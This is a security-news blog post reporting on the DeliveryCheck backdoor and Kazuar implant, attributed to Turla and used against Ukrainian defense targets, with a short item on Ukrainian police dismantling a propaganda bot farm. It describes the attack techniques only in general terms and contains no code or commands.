Backdoor Malware Used Against Ukrainian Defense Entities

russia ukraine cyber attack hermeticwiper

A new .NET-based backdoor, named DeliveryCheck (also known as CAPIBAR or GAMEDAY), has been identified, specifically targeting the defense sector in Ukraine and Eastern Europe. This sophisticated backdoor has the capability to deliver subsequent payloads.

The attacks have been attributed to a Russian nation-state actor called Turla, which goes by various names like Iron Hunter, Secret Blizzard (formerly Krypton), Uroburos, Venomous Bear, and Waterbug. Turla is known to be linked to Russia's Federal Security Service (FSB). The attack vector involves distributing DeliveryCheck via email, utilizing documents containing malicious macros. Once infiltrated, DeliveryCheck persists through a scheduled task, which downloads and executes it in memory. Furthermore, it communicates with a command-and-control (C2) server to retrieve tasks, including launching arbitrary payloads embedded in XSLT stylesheets.

Initial Attack Uses Kazuar Implant

In some instances, the initial access is accompanied by the distribution of a known Turla implant known as Kazuar. This implant is well-equipped to steal application configuration files, event logs, and various data from web browsers. The main objective of these attacks is to exfiltrate messages from the Signal messaging app on Windows, enabling the adversaries to access sensitive conversations, documents, and images on the targeted systems.

A significant aspect of DeliveryCheck is its ability to compromise Microsoft Exchange servers by installing a server-side component using PowerShell Desired State Configuration (DSC), a platform that facilitates the automated configuration of Windows systems. This allows DSC to generate a Managed Object Format (MOF) file containing a PowerShell script that loads the embedded .NET payload into memory, effectively transforming a legitimate server into a malicious C2 center.

Ukraine Takes Down Propaganda Bot Farm

In parallel, the Cyber Police of Ukraine successfully dismantled a large-scale bot farm, implicating more than 100 individuals engaged in spreading hostile propaganda justifying the Russian invasion. The group was also involved in leaking personal information belonging to Ukrainian citizens and executing various fraud schemes. As part of this operation, searches were conducted in 21 locations, resulting in the seizure of computer equipment, mobile phones, over 250 GSM gateways, and about 150,000 SIM cards belonging to different mobile operators.

By Zaib
July 20, 2023
Computer Security
English
July 20, 2023
Computer Security

Popular Posts

As Fears of the Coronavirus Pandemic Spread, So Does...

4 years ago

Microsoft Warns State-Backed Threat Actors Are Using AI in...

4 days ago

Trojan Al11 Malware Detection & Removal - An Essential...

11 months ago

Pinaview is a Fully-Featured Adware App

10 months ago

"Your iCloud is Being Hacked" and "Your iPhone has Been...

7 months ago

What is Lucky Ransomware?

7 months ago

Related Posts

Malware

CaddyWiper Malware Unleashed against Ukrainian Networks

Russian cybercriminals continue to unleash new malware against Ukrainian systems and networks. Due to the nature of the current conflict, they are not focused on spying on their victims or stealing information.... Read more

March 15, 2022
Malware

Destructive HermeticWiper Malware Targets Ukrainian Entities

The Russian cyber division have unleashed a flurry of attacks or Ukrainian systems and network infrastructure. The ongoing military conflict is fought both in the real world, and on the Internet. One of the new... Read more

February 25, 2022
Malware

Saitama Backdoor

Saitama backdoor is the name of a newly discovered piece of malware, coded and compiled in .Net. As the name suggests, Saitama operates like a backdoor. The malware is distributed as an executable file, named... Read more

May 20, 2022
English
Loading...

Cyclonis Backup Details & Terms

The Free Basic Cyclonis Backup plan gives you 2 GB of cloud storage space with full functionality! No credit card required. Need more storage space? Purchase a larger Cyclonis Backup plan today! To learn more about our policies and pricing, see Terms of Service, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.

Cyclonis Password Manager Details & Terms

FREE Trial: 30-Day One-Time Offer! No credit card required for Free Trial. Full functionality for the length of the Free Trial. (Full functionality after Free Trial requires subscription purchase.) To learn more about our policies and pricing, see EULA, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.

Home

Products

Cyclonis Backup Cyclonis Password Manager Cyclonis World Time

Support

Help Files FAQs Downloads Inquiries & Support

Company

About Us Contact Us Report Abuse

Legal (Post Merger)

EnigmaSoft Limited (fka Cyclonis Limited)

Cyclonis Backup's Terms of Service Cyclonis Password Manager's EULA Cyclonis World Time's Terms of Service Privacy Policy Cookie Policy Special Discount Offer Terms Additional Terms & Conditions SpyHunter EULA RegHunter EULA EnigmaSoft Privacy Policy & Cookie Policy ESG Privacy Policy & Cookie Policy EnigmaSoft Discount Offer Terms ESG Discount Offer Terms

© 2017-2024 Cyclonis Ltd. CYCLONIS is a trademark of EnigmaSoft Limited (Cyclonis was merged into EnigmaSoft Limited effective November 25, 2023.) All rights reserved.

Registered Office EnigmaSoft Limited: 1 Castle Street, 3rd Floor, Dublin 2 D02 XD82, Ireland.
EnigmaSoft Limited, Private Company Limited by shares, Company Registration Number 597114.

Windows is a trademark of Microsoft, registered in the U.S. and other countries.
Mac, iPhone, iPad and App Store are trademarks of Apple Inc., registered in the U.S. and other countries.
iOS is a registered trademark of Cisco Systems, Inc. and/or its affiliates in the United States and certain other countries.
Android and Google Play are trademarks of Google LLC.